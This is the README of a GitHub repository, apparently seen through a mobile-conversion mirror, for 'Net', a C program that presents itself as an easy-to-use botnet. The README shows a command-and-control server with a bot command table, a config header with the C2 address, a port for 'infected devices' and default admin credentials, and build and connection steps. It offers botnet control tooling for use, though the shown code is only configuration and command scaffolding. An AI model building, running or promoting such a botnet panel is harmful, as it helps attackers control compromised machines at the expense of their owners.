Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
/NetPublic

A fast, lightweight botnet written in pure C.

NotificationsYou must be signed in to change notification settings

0x1CA3/Net

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 

Repository files navigation


Net - A botnet written in C.

Net is a very easy-to-use botnet that has several options while being highly customizable.

Version

Features

FeatureDescription
Multi-threadingThe server works in the background while the CLI is running.
Sending dataYou can send data to all the connected devices.
Clean interfaceNet has an easy-to-use clean CLI that is easy to navigate.
Dynamic CommandsNet makes it very easy for you to add your own commands.

Dynamic Commands & Custom Commands

To add commands, simply create your function and then add the custom command and function tobotnet_commands as shown below.

structfunctionbotnet_commands[]= {    {"custom_command",custom_function},// <- The custom command goes right here! Make sure you have already written your function!    {"?",help_menu},    {"help",help_menu},    {"bots",bot_count},    {"list",bot_count},    {"server",cnc_details},    {"banner",display_banner},    {"clear",clear_screen},    {"cls",clear_screen},};

Configuration

To edit the configuration for the botnet, head over toincludes/config/config.h.

#pragma once/*    *    includes/config/config.h    *    Date: 11/09/21    *    Author: 0x1CA3*/#defineUSERNAME "admin"#definePASSWORD "password"#defineMAX_DEVICES 99999#defineCNC_IP "127.0.0.1"#defineCNC_PORT 1337/* This is the port your bots/infected devices will use to connect */#defineADMIN_PORT 1233/* This is the port you will use when connecting to the admin panel */

Installation & Setup

gcc -o net net.c -lpthread./netOpen up a new terminal windowConnect to the CnC | Example: nc 127.0.0.1 3434Login with the default credentials [admin:password]

Update Log

[11/9/21] - Removed 'adb_check' option[11/9/21] - Remade 'Net'[9/14/21] - Created 'Net'

Screenshots

botnet.png

Credits

https://github.com/0x1CA3

Contributions 🎉

All contributions are accepted, simply open an Issue / Pull request.

Releases

No releases published

Packages

No packages published

Languages


[8]ページ先頭

©2009-2025 Movatter.jp